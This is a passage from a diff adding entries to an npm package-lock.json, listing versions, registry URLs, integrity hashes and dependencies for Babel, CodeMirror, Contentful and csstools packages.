"https://registry.npmjs.org/@babel/plugin-transform-reserved-words/-/plugin-transform-reserved-words-7.24.7.tgz", + "integrity": "sha512-0DUq0pHcPKbjFZCfTss/pGkYMfy3vFWydkUBd9r0GHpIyfs2eCDENvqadMycRS9wZCXR41wucAfJHJmwA0UmoQ==", + "dev": true, + "dependencies": { + "@babel/helper-plugin-utils": "^7.24.7" + }, + "engines": { + "node": ">=6.9.0" + }, + "peerDependencies": { + "@babel/core": "^7.0.0-0" + } + }, + "node_modules/@babel/plugin-transform-shorthand-properties": { + "version": "7.24.7", + "resolved": "https://registry.npmjs.org/@babel/plugin-transform-shorthand-properties/-/plugin-transform-shorthand-properties-7.24.7.tgz", + "integrity": "sha512-KsDsevZMDsigzbA09+vacnLpmPH4aWjcZjXdyFKGzpplxhbeB4wYtury3vglQkg6KM/xEPKt73eCjPPf1PgXBA==", + "dev": true, + "dependencies": { + "@babel/helper-plugin-utils": "^7.24.7" + }, + "engines": { + "node": ">=6.9.0" + }, + "peerDependencies": { + "@babel/core": "^7.0.0-0" + } + }, + "node_modules/@babel/plugin-transform-spread": { + "version": "7.24.7", + "resolved": "https://registry.npmjs.org/@babel/plugin-transform-spread/-/plugin-transform-spread-7.24.7.tgz", + "integrity": "sha512-x96oO0I09dgMDxJaANcRyD4ellXFLLiWhuwDxKZX5g2rWP1bTPkBSwCYv96VDXVT1bD9aPj8tppr5ITIh8hBng==", + "dev": true, + "dependencies": { + "@babel/helper-plugin-utils": "^7.24.7", + "@babel/helper-skip-transparent-expression-wrappers": "^7.24.7" + }, + "engines": { + "node": ">=6.9.0" + }, + "peerDependencies": { + "@babel/core": "^7.0.0-0" + } + }, + "node_modules/@babel/plugin-transform-sticky-regex": { + "version": "7.24.7", + "resolved": "https://registry.npmjs.org/@babel/plugin-transform-sticky-regex/-/plugin-transform-sticky-regex-7.24.7.tgz", + "integrity": "sha512-kHPSIJc9v24zEml5geKg9Mjx5ULpfncj0wRpYtxbvKyTtHCYDkVE3aHQ03FrpEo4gEe2vrJJS1Y9CJTaThA52g==", + "dev": true, + "dependencies": { + "@babel/helper-plugin-utils": "^7.24.7" + }, + "engines": { + "node": ">=6.9.0" + }, + "peerDependencies": { + "@babel/core": "^7.0.0-0" + } + }, + "node_modules/@babel/plugin-transform-template-literals": { + "version": "7.24.7", + "resolved": "https://registry.npmjs.org/@babel/plugin-transform-template-literals/-/plugin-transform-template-literals-7.24.7.tgz", + "integrity": "sha512-AfDTQmClklHCOLxtGoP7HkeMw56k1/bTQjwsfhL6pppo/M4TOBSq+jjBUBLmV/4oeFg4GWMavIl44ZeCtmmZTw==", + "dev": true, + "dependencies": { + "@babel/helper-plugin-utils": "^7.24.7" + }, + "engines": { + "node": ">=6.9.0" + }, + "peerDependencies": { + "@babel/core": "^7.0.0-0" + } + }, + "node_modules/@babel/plugin-transform-typeof-symbol": { + "version": "7.24.8", + "resolved": "https://registry.npmjs.org/@babel/plugin-transform-typeof-symbol/-/plugin-transform-typeof-symbol-7.24.8.tgz", + "integrity": "sha512-adNTUpDCVnmAE58VEqKlAA6ZBlNkMnWD0ZcW76lyNFN3MJniyGFZfNwERVk8Ap56MCnXztmDr19T4mPTztcuaw==", + "dev": true, + "dependencies": { + "@babel/helper-plugin-utils": "^7.24.8" + }, + "engines": { + "node": ">=6.9.0" + }, + "peerDependencies": { + "@babel/core": "^7.0.0-0" + } + }, + "node_modules/@babel/plugin-transform-typescript": { + "version": "7.25.2", + "resolved": "https://registry.npmjs.org/@babel/plugin-transform-typescript/-/plugin-transform-typescript-7.25.2.tgz", + "integrity": "sha512-lBwRvjSmqiMYe/pS0+1gggjJleUJi7NzjvQ1Fkqtt69hBa/0t1YuW/MLQMAPixfwaQOHUXsd6jeU3Z+vdGv3+A==", + "dev": true, + "dependencies": { + "@babel/helper-annotate-as-pure": "^7.24.7", + "@babel/helper-create-class-features-plugin": "^7.25.0", + "@babel/helper-plugin-utils": "^7.24.8", + "@babel/helper-skip-transparent-expression-wrappers": "^7.24.7", + "@babel/plugin-syntax-typescript": "^7.24.7" + }, + "engines": { + "node": ">=6.9.0" + }, + "peerDependencies": { + "@babel/core": "^7.0.0-0" + } + }, + "node_modules/@babel/plugin-transform-unicode-escapes": { + "version": "7.24.7", + "resolved": "https://registry.npmjs.org/@babel/plugin-transform-unicode-escapes/-/plugin-transform-unicode-escapes-7.24.7.tgz", + "integrity": "sha512-U3ap1gm5+4edc2Q/P+9VrBNhGkfnf+8ZqppY71Bo/pzZmXhhLdqgaUl6cuB07O1+AQJtCLfaOmswiNbSQ9ivhw==", + "dev": true, + "dependencies": { + "@babel/helper-plugin-utils": "^7.24.7" + }, + "engines": { + "node": ">=6.9.0" + }, + "peerDependencies": { + "@babel/core": "^7.0.0-0" + } + }, + "node_modules/@babel/plugin-transform-unicode-property-regex": { + "version": "7.24.7", + "resolved": "https://registry.npmjs.org/@babel/plugin-transform-unicode-property-regex/-/plugin-transform-unicode-property-regex-7.24.7.tgz", + "integrity": "sha512-uH2O4OV5M9FZYQrwc7NdVmMxQJOCCzFeYudlZSzUAHRFeOujQefa92E74TQDVskNHCzOXoigEuoyzHDhaEaK5w==", + "dev": true, + "dependencies": { + "@babel/helper-create-regexp-features-plugin": "^7.24.7", + "@babel/helper-plugin-utils": "^7.24.7" + }, + "engines": { + "node": ">=6.9.0" + }, + "peerDependencies": { + "@babel/core": "^7.0.0-0" + } + }, + "node_modules/@babel/plugin-transform-unicode-regex": { + "version": "7.24.7", + "resolved": "https://registry.npmjs.org/@babel/plugin-transform-unicode-regex/-/plugin-transform-unicode-regex-7.24.7.tgz", + "integrity": "sha512-hlQ96MBZSAXUq7ltkjtu3FJCCSMx/j629ns3hA3pXnBXjanNP0LHi+JpPeA81zaWgVK1VGH95Xuy7u0RyQ8kMg==", + "dev": true, + "dependencies": { + "@babel/helper-create-regexp-features-plugin": "^7.24.7", + "@babel/helper-plugin-utils": "^7.24.7" + }, + "engines": { + "node": ">=6.9.0" + }, + "peerDependencies": { + "@babel/core": "^7.0.0-0" + } + }, + "node_modules/@babel/plugin-transform-unicode-sets-regex": { + "version": "7.24.7", + "resolved": "https://registry.npmjs.org/@babel/plugin-transform-unicode-sets-regex/-/plugin-transform-unicode-sets-regex-7.24.7.tgz", + "integrity": "sha512-2G8aAvF4wy1w/AGZkemprdGMRg5o6zPNhbHVImRz3lss55TYCBd6xStN19rt8XJHq20sqV0JbyWjOWwQRwV/wg==", + "dev": true, + "dependencies": { + "@babel/helper-create-regexp-features-plugin": "^7.24.7", + "@babel/helper-plugin-utils": "^7.24.7" + }, + "engines": { + "node": ">=6.9.0" + }, + "peerDependencies": { + "@babel/core": "^7.0.0" + } + }, + "node_modules/@babel/polyfill": { + "version": "7.12.1", + "resolved": "https://registry.npmjs.org/@babel/polyfill/-/polyfill-7.12.1.tgz", + "integrity": "sha512-X0pi0V6gxLi6lFZpGmeNa4zxtwEmCs42isWLNjZZDE0Y8yVfgu0T2OAHlzBbdYlqbW/YXVvoBHpATEM+goCj8g==", + "deprecated": "🚨 This package has been deprecated in favor of separate inclusion of a polyfill and regenerator-runtime (when needed). See the @babel/polyfill docs (https://babeljs.io/docs/en/babel-polyfill) for more information.", + "dev": true, + "dependencies": { + "core-js": "^2.6.5", + "regenerator-runtime": "^0.13.4" + } + }, + "node_modules/@babel/polyfill/node_modules/core-js": { + "version": "2.6.12", + "resolved": "https://registry.npmjs.org/core-js/-/core-js-2.6.12.tgz", + "integrity": "sha512-Kb2wC0fvsWfQrgk8HU5lW6U/Lcs8+9aaYcy4ZFc6DDlo4nZ7n70dEgE5rtR0oG6ufKDUnrwfWL1mXR5ljDatrQ==", + "deprecated": "core-js@<3.23.3 is no longer maintained and not recommended for usage due to the number of issues. Because of the V8 engine whims, feature detection in old core-js versions could cause a slowdown up to 100x even if nothing is polyfilled. Some versions have web compatibility issues. Please, upgrade your dependencies to the actual version of core-js.", + "dev": true, + "hasInstallScript": true + }, + "node_modules/@babel/preset-env": { + "version": "7.25.3", + "resolved": "https://registry.npmjs.org/@babel/preset-env/-/preset-env-7.25.3.tgz", + "integrity": "sha512-QsYW7UeAaXvLPX9tdVliMJE7MD7M6MLYVTovRTIwhoYQVFHR1rM4wO8wqAezYi3/BpSD+NzVCZ69R6smWiIi8g==", + "dev": true, + "dependencies": { + "@babel/compat-data": "^7.25.2", + "@babel/helper-compilation-targets": "^7.25.2", + "@babel/helper-plugin-utils": "^7.24.8", + "@babel/helper-validator-option": "^7.24.8", + "@babel/plugin-bugfix-firefox-class-in-computed-class-key": "^7.25.3", + "@babel/plugin-bugfix-safari-class-field-initializer-scope": "^7.25.0", + "@babel/plugin-bugfix-safari-id-destructuring-collision-in-function-expression": "^7.25.0", + "@babel/plugin-bugfix-v8-spread-parameters-in-optional-chaining": "^7.24.7", + "@babel/plugin-bugfix-v8-static-class-fields-redefine-readonly": "^7.25.0", + "@babel/plugin-proposal-private-property-in-object": "7.21.0-placeholder-for-preset-env.2", + "@babel/plugin-syntax-async-generators": "^7.8.4", + "@babel/plugin-syntax-class-properties": "^7.12.13", + "@babel/plugin-syntax-class-static-block": "^7.14.5", + "@babel/plugin-syntax-dynamic-import": "^7.8.3", + "@babel/plugin-syntax-export-namespace-from": "^7.8.3", + "@babel/plugin-syntax-import-assertions": "^7.24.7", + "@babel/plugin-syntax-import-attributes": "^7.24.7", + "@babel/plugin-syntax-import-meta": "^7.10.4", + "@babel/plugin-syntax-json-strings": "^7.8.3", + "@babel/plugin-syntax-logical-assignment-operators": "^7.10.4", + "@babel/plugin-syntax-nullish-coalescing-operator": "^7.8.3", + "@babel/plugin-syntax-numeric-separator": "^7.10.4", + "@babel/plugin-syntax-object-rest-spread": "^7.8.3", + "@babel/plugin-syntax-optional-catch-binding": "^7.8.3", + "@babel/plugin-syntax-optional-chaining": "^7.8.3", + "@babel/plugin-syntax-private-property-in-object": "^7.14.5", + "@babel/plugin-syntax-top-level-await": "^7.14.5", + "@babel/plugin-syntax-unicode-sets-regex": "^7.18.6", + "@babel/plugin-transform-arrow-functions": "^7.24.7", + "@babel/plugin-transform-async-generator-functions": "^7.25.0", + "@babel/plugin-transform-async-to-generator": "^7.24.7", + "@babel/plugin-transform-block-scoped-functions": "^7.24.7", + "@babel/plugin-transform-block-scoping": "^7.25.0", + "@babel/plugin-transform-class-properties": "^7.24.7", + "@babel/plugin-transform-class-static-block": "^7.24.7", + "@babel/plugin-transform-classes": "^7.25.0", + "@babel/plugin-transform-computed-properties": "^7.24.7", + "@babel/plugin-transform-destructuring": "^7.24.8", + "@babel/plugin-transform-dotall-regex": "^7.24.7", + "@babel/plugin-transform-duplicate-keys": "^7.24.7", + "@babel/plugin-transform-duplicate-named-capturing-groups-regex": "^7.25.0", + "@babel/plugin-transform-dynamic-import": "^7.24.7", + "@babel/plugin-transform-exponentiation-operator": "^7.24.7", + "@babel/plugin-transform-export-namespace-from": "^7.24.7", + "@babel/plugin-transform-for-of": "^7.24.7", + "@babel/plugin-transform-function-name": "^7.25.1", + "@babel/plugin-transform-json-strings": "^7.24.7", + "@babel/plugin-transform-literals": "^7.25.2", + "@babel/plugin-transform-logical-assignment-operators": "^7.24.7", + "@babel/plugin-transform-member-expression-literals": "^7.24.7", + "@babel/plugin-transform-modules-amd": "^7.24.7", + "@babel/plugin-transform-modules-commonjs": "^7.24.8", + "@babel/plugin-transform-modules-systemjs": "^7.25.0", + "@babel/plugin-transform-modules-umd": "^7.24.7", + "@babel/plugin-transform-named-capturing-groups-regex": "^7.24.7", + "@babel/plugin-transform-new-target": "^7.24.7", + "@babel/plugin-transform-nullish-coalescing-operator": "^7.24.7", + "@babel/plugin-transform-numeric-separator": "^7.24.7", + "@babel/plugin-transform-object-rest-spread": "^7.24.7", + "@babel/plugin-transform-object-super": "^7.24.7", + "@babel/plugin-transform-optional-catch-binding": "^7.24.7", + "@babel/plugin-transform-optional-chaining": "^7.24.8", + "@babel/plugin-transform-parameters": "^7.24.7", + "@babel/plugin-transform-private-methods": "^7.24.7", + "@babel/plugin-transform-private-property-in-object": "^7.24.7", + "@babel/plugin-transform-property-literals": "^7.24.7", + "@babel/plugin-transform-regenerator": "^7.24.7", + "@babel/plugin-transform-reserved-words": "^7.24.7", + "@babel/plugin-transform-shorthand-properties": "^7.24.7", + "@babel/plugin-transform-spread": "^7.24.7", + "@babel/plugin-transform-sticky-regex": "^7.24.7", + "@babel/plugin-transform-template-literals": "^7.24.7", + "@babel/plugin-transform-typeof-symbol": "^7.24.8", + "@babel/plugin-transform-unicode-escapes": "^7.24.7", + "@babel/plugin-transform-unicode-property-regex": "^7.24.7", + "@babel/plugin-transform-unicode-regex": "^7.24.7", + "@babel/plugin-transform-unicode-sets-regex": "^7.24.7", + "@babel/preset-modules": "0.1.6-no-external-plugins", + "babel-plugin-polyfill-corejs2": "^0.4.10", + "babel-plugin-polyfill-corejs3": "^0.10.4", + "babel-plugin-polyfill-regenerator": "^0.6.1", + "core-js-compat": "^3.37.1", + "semver": "^6.3.1" + }, + "engines": { + "node": ">=6.9.0" + }, + "peerDependencies": { + "@babel/core": "^7.0.0-0" + } + }, + "node_modules/@babel/preset-flow": { + "version": "7.25.9", + "resolved": "https://registry.npmjs.org/@babel/preset-flow/-/preset-flow-7.25.9.tgz", + "integrity": "sha512-EASHsAhE+SSlEzJ4bzfusnXSHiU+JfAYzj+jbw2vgQKgq5HrUr8qs+vgtiEL5dOH6sEweI+PNt2D7AqrDSHyqQ==", + "dev": true, + "dependencies": { + "@babel/helper-plugin-utils": "^7.25.9", + "@babel/helper-validator-option": "^7.25.9", + "@babel/plugin-transform-flow-strip-types": "^7.25.9" + }, + "engines": { + "node": ">=6.9.0" + }, + "peerDependencies": { + "@babel/core": "^7.0.0-0" + } + }, + "node_modules/@babel/preset-modules": { + "version": "0.1.6-no-external-plugins", + "resolved": "https://registry.npmjs.org/@babel/preset-modules/-/preset-modules-0.1.6-no-external-plugins.tgz", + "integrity": "sha512-HrcgcIESLm9aIR842yhJ5RWan/gebQUJ6E/E5+rf0y9o6oj7w0Br+sWuL6kEQ/o/AdfvR1Je9jG18/gnpwjEyA==", + "dev": true, + "dependencies": { + "@babel/helper-plugin-utils": "^7.0.0", + "@babel/types": "^7.4.4", + "esutils": "^2.0.2" + }, + "peerDependencies": { + "@babel/core": "^7.0.0-0 || ^8.0.0-0 <8.0.0" + } + }, + "node_modules/@babel/preset-react": { + "version": "7.24.7", + "resolved": "https://registry.npmjs.org/@babel/preset-react/-/preset-react-7.24.7.tgz", + "integrity": "sha512-AAH4lEkpmzFWrGVlHaxJB7RLH21uPQ9+He+eFLWHmF9IuFQVugz8eAsamaW0DXRrTfco5zj1wWtpdcXJUOfsag==", + "dev": true, + "dependencies": { + "@babel/helper-plugin-utils": "^7.24.7", + "@babel/helper-validator-option": "^7.24.7", + "@babel/plugin-transform-react-display-name": "^7.24.7", + "@babel/plugin-transform-react-jsx": "^7.24.7", + "@babel/plugin-transform-react-jsx-development": "^7.24.7", + "@babel/plugin-transform-react-pure-annotations": "^7.24.7" + }, + "engines": { + "node": ">=6.9.0" + }, + "peerDependencies": { + "@babel/core": "^7.0.0-0" + } + }, + "node_modules/@babel/preset-typescript": { + "version": "7.24.7", + "resolved": "https://registry.npmjs.org/@babel/preset-typescript/-/preset-typescript-7.24.7.tgz", + "integrity": "sha512-SyXRe3OdWwIwalxDg5UtJnJQO+YPcTfwiIY2B0Xlddh9o7jpWLvv8X1RthIeDOxQ+O1ML5BLPCONToObyVQVuQ==", + "dev": true, + "dependencies": { + "@babel/helper-plugin-utils": "^7.24.7", + "@babel/helper-validator-option": "^7.24.7", + "@babel/plugin-syntax-jsx": "^7.24.7", + "@babel/plugin-transform-modules-commonjs": "^7.24.7", + "@babel/plugin-transform-typescript": "^7.24.7" + }, + "engines": { + "node": ">=6.9.0" + }, + "peerDependencies": { + "@babel/core": "^7.0.0-0" + } + }, + "node_modules/@babel/register": { + "version": "7.24.6", + "resolved": "https://registry.npmjs.org/@babel/register/-/register-7.24.6.tgz", + "integrity": "sha512-WSuFCc2wCqMeXkz/i3yfAAsxwWflEgbVkZzivgAmXl/MxrXeoYFZOOPllbC8R8WTF7u61wSRQtDVZ1879cdu6w==", + "dev": true, + "dependencies": { + "clone-deep": "^4.0.1", + "find-cache-dir": "^2.0.0", + "make-dir": "^2.1.0", + "pirates": "^4.0.6", + "source-map-support": "^0.5.16" + }, + "engines": { + "node": ">=6.9.0" + }, + "peerDependencies": { + "@babel/core": "^7.0.0-0" + } + }, + "node_modules/@babel/regjsgen": { + "version": "0.8.0", + "resolved": "https://registry.npmjs.org/@babel/regjsgen/-/regjsgen-0.8.0.tgz", + "integrity": "sha512-x/rqGMdzj+fWZvCOYForTghzbtqPDZ5gPwaoNGHdgDfF2QA/XZbCBp4Moo5scrkAMPhB7z26XM/AaHuIJdgauA==", + "dev": true + }, + "node_modules/@babel/runtime": { + "version": "7.23.2", + "resolved": "https://registry.npmjs.org/@babel/runtime/-/runtime-7.23.2.tgz", + "integrity": "sha512-mM8eg4yl5D6i3lu2QKPuPH4FArvJ8KhTofbE7jwMUv9KX5mBvwPAqnV3MlyBNqdp9RyRKP6Yck8TrfYrPvX3bg==", + "dependencies": { + "regenerator-runtime": "^0.14.0" + }, + "engines": { + "node": ">=6.9.0" + } + }, + "node_modules/@babel/runtime-corejs3": { + "version": "7.16.8", + "resolved": "https://registry.npmjs.org/@babel/runtime-corejs3/-/runtime-corejs3-7.16.8.tgz", + "integrity": "sha512-3fKhuICS1lMz0plI5ktOE/yEtBRMVxplzRkdn6mJQ197XiY0JnrzYV0+Mxozq3JZ8SBV9Ecurmw1XsGbwOf+Sg==", + "dependencies": { + "core-js-pure": "^3.20.2", + "regenerator-runtime": "^0.13.4" + }, + "engines": { + "node": ">=6.9.0" + } + }, + "node_modules/@babel/runtime/node_modules/regenerator-runtime": { + "version": "0.14.0", + "resolved": "https://registry.npmjs.org/regenerator-runtime/-/regenerator-runtime-0.14.0.tgz", + "integrity": "sha512-srw17NI0TUWHuGa5CFGGmhfNIeja30WMBfbslPNhf6JrqQlLN5gcrvig1oqPxiVaXb0oW0XRKtH6Nngs5lKCIA==" + }, + "node_modules/@babel/template": { + "version": "7.26.9", + "resolved": "https://registry.npmjs.org/@babel/template/-/template-7.26.9.tgz", + "integrity": "sha512-qyRplbeIpNZhmzOysF/wFMuP9sctmh2cFzRAZOn1YapxBsE1i9bJIY586R/WBLfLcmcBlM8ROBiQURnnNy+zfA==", + "dev": true, + "license": "MIT", + "dependencies": { + "@babel/code-frame": "^7.26.2", + "@babel/parser": "^7.26.9", + "@babel/types": "^7.26.9" + }, + "engines": { + "node": ">=6.9.0" + } + }, + "node_modules/@babel/traverse": { + "version": "7.26.9", + "resolved": "https://registry.npmjs.org/@babel/traverse/-/traverse-7.26.9.tgz", + "integrity": "sha512-ZYW7L+pL8ahU5fXmNbPF+iZFHCv5scFak7MZ9bwaRPLUhHh7QQEMjZUg0HevihoqCM5iSYHN61EyCoZvqC+bxg==", + "dev": true, + "license": "MIT", + "dependencies": { + "@babel/code-frame": "^7.26.2", + "@babel/generator": "^7.26.9", + "@babel/parser": "^7.26.9", + "@babel/template": "^7.26.9", + "@babel/types": "^7.26.9", + "debug": "^4.3.1", + "globals": "^11.1.0" + }, + "engines": { + "node": ">=6.9.0" + } + }, + "node_modules/@babel/types": { + "version": "7.26.9", + "resolved": "https://registry.npmjs.org/@babel/types/-/types-7.26.9.tgz", + "integrity": "sha512-Y3IR1cRnOxOCDvMmNiym7XpXQ93iGDDPHx+Zj+NM+rg0fBaShfQLkg+hKPaZCEvg5N/LeCo4+Rj/i3FuJsIQaw==", + "license": "MIT", + "dependencies": { + "@babel/helper-string-parser": "^7.25.9", + "@babel/helper-validator-identifier": "^7.25.9" + }, + "engines": { + "node": ">=6.9.0" + } + }, + "node_modules/@balena/dockerignore": { + "version": "1.0.2", + "resolved": "https://registry.npmjs.org/@balena/dockerignore/-/dockerignore-1.0.2.tgz", + "integrity": "sha512-wMue2Sy4GAVTk6Ic4tJVcnfdau+gx2EnG7S+uAEe+TWJFqE4YoWN4/H8MSLj4eYJKxGg26lZwboEniNiNwZQ6Q==", + "license": "Apache-2.0" + }, + "node_modules/@bcoe/v8-coverage": { + "version": "0.2.3", + "resolved": "https://registry.npmjs.org/@bcoe/v8-coverage/-/v8-coverage-0.2.3.tgz", + "integrity": "sha512-0hYQ8SB4Db5zvZB4axdMHGwEaQjkZzFjQiN9LVYvIFB2nSUHW9tYpxWriPrWDASIxiaXax83REcLxuSdnGPZtw==", + "dev": true + }, + "node_modules/@codemirror/autocomplete": { + "version": "6.18.4", + "resolved": "git+ssh://git@github.com/overleaf/codemirror-autocomplete.git#6445cd056671c98d12d1c597ba705e11327ec4c5", + "integrity": "sha512-NOpHncgkcZ2w92bO+H6mIzcSToAKt1fWQRImKnDsNbYvp4X/638d6SOuEoE7pSZ7tryJbqKDrE3Zs6nVIXACUA==", + "dev": true, + "license": "MIT", + "dependencies": { + "@codemirror/language": "^6.0.0", + "@codemirror/state": "^6.0.0", + "@codemirror/view": "^6.17.0", + "@lezer/common": "^1.0.0" + } + }, + "node_modules/@codemirror/commands": { + "version": "6.8.0", + "resolved": "https://registry.npmjs.org/@codemirror/commands/-/commands-6.8.0.tgz", + "integrity": "sha512-q8VPEFaEP4ikSlt6ZxjB3zW72+7osfAYW9i8Zu943uqbKuz6utc1+F170hyLUCUltXORjQXRyYQNfkckzA/bPQ==", + "dev": true, + "license": "MIT", + "dependencies": { + "@codemirror/language": "^6.0.0", + "@codemirror/state": "^6.4.0", + "@codemirror/view": "^6.27.0", + "@lezer/common": "^1.1.0" + } + }, + "node_modules/@codemirror/lang-css": { + "version": "6.0.0", + "resolved": "https://registry.npmjs.org/@codemirror/lang-css/-/lang-css-6.0.0.tgz", + "integrity": "sha512-jBqc+BTuwhNOTlrimFghLlSrN6iFuE44HULKWoR4qKYObhOIl9Lci1iYj6zMIte1XTQmZguNvjXMyr43LUKwSw==", + "dev": true, + "dependencies": { + "@codemirror/autocomplete": "^6.0.0", + "@codemirror/language": "^6.0.0", + "@codemirror/state": "^6.0.0", + "@lezer/css": "^1.0.0" + } + }, + "node_modules/@codemirror/lang-html": { + "version": "6.1.0", + "resolved": "https://registry.npmjs.org/@codemirror/lang-html/-/lang-html-6.1.0.tgz", + "integrity": "sha512-gA7NmJxqvnhwza05CvR7W/39Ap9r/4Vs9uiC0IeFYo1hSlJzc/8N6Evviz6vTW1x8SpHcRYyqKOf6rpl6LfWtg==", + "dev": true, + "dependencies": { + "@codemirror/autocomplete": "^6.0.0", + "@codemirror/lang-css": "^6.0.0", + "@codemirror/lang-javascript": "^6.0.0", + "@codemirror/language": "^6.0.0", + "@codemirror/state": "^6.0.0", + "@lezer/common": "^1.0.0", + "@lezer/html": "^1.0.0" + } + }, + "node_modules/@codemirror/lang-javascript": { + "version": "6.0.1", + "resolved": "https://registry.npmjs.org/@codemirror/lang-javascript/-/lang-javascript-6.0.1.tgz", + "integrity": "sha512-kjGbBEosl+ozDU5ruDV48w4v3H6KECTFiDjqMLT0KhVwESPfv3wOvnDrTT0uaMOg3YRGnBWsyiIoKHl/tNWWDg==", + "dev": true, + "dependencies": { + "@codemirror/autocomplete": "^6.0.0", + "@codemirror/language": "^6.0.0", + "@codemirror/lint": "^6.0.0", + "@codemirror/state": "^6.0.0", + "@codemirror/view": "^6.0.0", + "@lezer/common": "^1.0.0", + "@lezer/javascript": "^1.0.0" + } + }, + "node_modules/@codemirror/lang-markdown": { + "version": "6.3.2", + "resolved": "https://registry.npmjs.org/@codemirror/lang-markdown/-/lang-markdown-6.3.2.tgz", + "integrity": "sha512-c/5MYinGbFxYl4itE9q/rgN/sMTjOr8XL5OWnC+EaRMLfCbVUmmubTJfdgpfcSS2SCaT7b+Q+xi3l6CgoE+BsA==", + "dev": true, + "license": "MIT", + "dependencies": { + "@codemirror/autocomplete": "^6.7.1", + "@codemirror/lang-html": "^6.0.0", + "@codemirror/language": "^6.3.0", + "@codemirror/state": "^6.0.0", + "@codemirror/view": "^6.0.0", + "@lezer/common": "^1.2.1", + "@lezer/markdown": "^1.0.0" + } + }, + "node_modules/@codemirror/language": { + "version": "6.10.8", + "resolved": "https://registry.npmjs.org/@codemirror/language/-/language-6.10.8.tgz", + "integrity": "sha512-wcP8XPPhDH2vTqf181U8MbZnW+tDyPYy0UzVOa+oHORjyT+mhhom9vBd7dApJwoDz9Nb/a8kHjJIsuA/t8vNFw==", + "dev": true, + "license": "MIT", + "dependencies": { + "@codemirror/state": "^6.0.0", + "@codemirror/view": "^6.23.0", + "@lezer/common": "^1.1.0", + "@lezer/highlight": "^1.0.0", + "@lezer/lr": "^1.0.0", + "style-mod": "^4.0.0" + } + }, + "node_modules/@codemirror/lint": { + "version": "6.8.4", + "resolved": "https://registry.npmjs.org/@codemirror/lint/-/lint-6.8.4.tgz", + "integrity": "sha512-u4q7PnZlJUojeRe8FJa/njJcMctISGgPQ4PnWsd9268R4ZTtU+tfFYmwkBvgcrK2+QQ8tYFVALVb5fVJykKc5A==", + "dev": true, + "license": "MIT", + "dependencies": { + "@codemirror/state": "^6.0.0", + "@codemirror/view": "^6.35.0", + "crelt": "^1.0.5" + } + }, + "node_modules/@codemirror/search": { + "version": "6.5.8", + "resolved": "git+ssh://git@github.com/overleaf/codemirror-search.git#04380a528c339cd4b78fb10b3ef017f657ec17bd", + "integrity": "sha512-G2sM4Rfnbb8S59HPgLXa2NWS4a9TDf+3cKos/58JPtDQtbBCcHz1c8Oy3x5PhQ+vJS+Mr282WLG8PE/MbhE0eg==", + "dev": true, + "license": "MIT", + "dependencies": { + "@codemirror/state": "^6.0.0", + "@codemirror/view": "^6.0.0", + "crelt": "^1.0.5" + } + }, + "node_modules/@codemirror/state": { + "version": "6.5.2", + "resolved": "https://registry.npmjs.org/@codemirror/state/-/state-6.5.2.tgz", + "integrity": "sha512-FVqsPqtPWKVVL3dPSxy8wEF/ymIEuVzF1PK3VbUgrxXpJUSHQWWZz4JMToquRxnkw+36LTamCZG2iua2Ptq0fA==", + "dev": true, + "license": "MIT", + "dependencies": { + "@marijn/find-cluster-break": "^1.0.0" + } + }, + "node_modules/@codemirror/view": { + "version": "6.36.3", + "resolved": "https://registry.npmjs.org/@codemirror/view/-/view-6.36.3.tgz", + "integrity": "sha512-N2bilM47QWC8Hnx0rMdDxO2x2ImJ1FvZWXubwKgjeoOrWwEiFrtpA7SFHcuZ+o2Ze2VzbkgbzWVj4+V18LVkeg==", + "dev": true, + "license": "MIT", + "dependencies": { + "@codemirror/state": "^6.5.0", + "style-mod": "^4.1.0", + "w3c-keyname": "^2.2.4" + } + }, + "node_modules/@contentful/rich-text-html-renderer": { + "version": "16.0.2", + "resolved": "https://registry.npmjs.org/@contentful/rich-text-html-renderer/-/rich-text-html-renderer-16.0.2.tgz", + "integrity": "sha512-0flmxVixlNk5PMiHXAlABUJ2uURsWxOjbC6ZHhqpEVHU03kHMoIKfDdo6CRZc0S0rMWMO3c14Ei91E97T06T8w==", + "dependencies": { + "@contentful/rich-text-types": "^16.0.2", + "escape-html": "^1.0.3" + }, + "engines": { + "node": ">=6.0.0" + } + }, + "node_modules/@contentful/rich-text-types": { + "version": "16.0.2", + "resolved": "https://registry.npmjs.org/@contentful/rich-text-types/-/rich-text-types-16.0.2.tgz", + "integrity": "sha512-ovbmCKQjlyGek4NuABoqDesC3FBV3e5jPMMdtT2mpOy9ia31MKO0NSFMRGZu7Q+veZzmDMja8S1i/XeFCUT9Pw==", + "engines": { + "node": ">=6.0.0" + } + }, + "node_modules/@csstools/cascade-layer-name-parser": { + "version": "1.0.5", + "resolved": "https://registry.npmjs.org/@csstools/cascade-layer-name-parser/-/cascade-layer-name-parser-1.0.5.tgz", + "integrity": "sha512-v/5ODKNBMfBl0us/WQjlfsvSlYxfZLhNMVIsuCPib2ulTwGKYbKJbwqw671+qH9Y4wvWVnu7LBChvml/wBKjFg==", + "dev": true, + "funding": [ + { + "type": "github", + "url": "https://github.com/sponsors/csstools" + }, + { + "type": "opencollective", + "url": "https://opencollective.com/csstools" + } + ], + "engines": { + "node": "^14 || ^16 || >=18" + }, + "peerDependencies": { + "@csstools/css-parser-algorithms": "^2.3.2", + "@csstools/css-tokenizer": "^2.2.1" + } + }, + "node_modules/@csstools/color-helpers": { + "version": "3.0.2", + "resolved": "https://registry.npmjs.org/@csstools/color-helpers/-/color-helpers-3.0.2.tgz", + "integrity": "sha512-NMVs/l7Y9eIKL5XjbCHEgGcG8LOUT2qVcRjX6EzkCdlvftHVKr2tHIPzHavfrULRZ5Q2gxrJ9f44dAlj6fX97Q==", + "dev": true, + "funding": [ + { + "type": "github", + "url": "https://github.com/sponsors/csstools" + }, + { + "type": "opencollective", + "url": "https://opencollective.com/csstools" + } + ], + "engines": { + "node": "^14 || ^16 || >=18" + } + }, + "node_modules/@csstools/css-calc": { + "version": "1.1.4", + "resolved": "https://registry.npmjs.org/@csstools/css-calc/-/css-calc-1.1.4.tgz", + "integrity": "sha512-ZV1TSmToiNcQL1P3hfzlzZzA02mmVkVmXGaUDUqpYUG84PmLhVSZpKX+KfxAuOcK7de04UXSQPBrAvaya6iiGg==", + "dev": true, + "funding": [ + { + "type": "github", + "url": "https://github.com/sponsors/csstools" + }, + { + "type": "opencollective", + "url": "https://opencollective.com/csstools" + } + ], + "engines": { + "node": "^14 || ^16 || >=18" + }, + "peerDependencies": { + "@csstools/css-parser-algorithms": "^2.3.2", + "@csstools/css-tokenizer": "^2.2.1" + } + }, + "node_modules/@csstools/css-color-parser": { + "version": "1.4.0", + "resolved": 